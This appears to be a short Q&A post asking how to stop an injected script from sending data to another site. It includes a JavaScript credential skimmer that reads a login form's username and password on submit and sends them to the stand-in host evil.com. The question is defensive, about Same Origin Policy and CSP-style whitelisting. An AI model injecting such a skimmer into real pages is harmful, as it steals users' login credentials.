Let's assume an attacker manages to inject this script in a login page:
const form = document.getElementsByTagName('form')[0];
form.addEventListener('submit', stealCredentials);
function stealCredentials() {
const login = document.getElementsByName('login')[0].value;
const password = document.getElementsByName('password')[0].value;
fetch('evil.com/?login=' + login + '&password=' + password);
}
Is it possible to prevent the request ? Same Origin Policy doesn't seem to support such restriction.
Maybe a whitelist similar to the one from Content Security Policy ?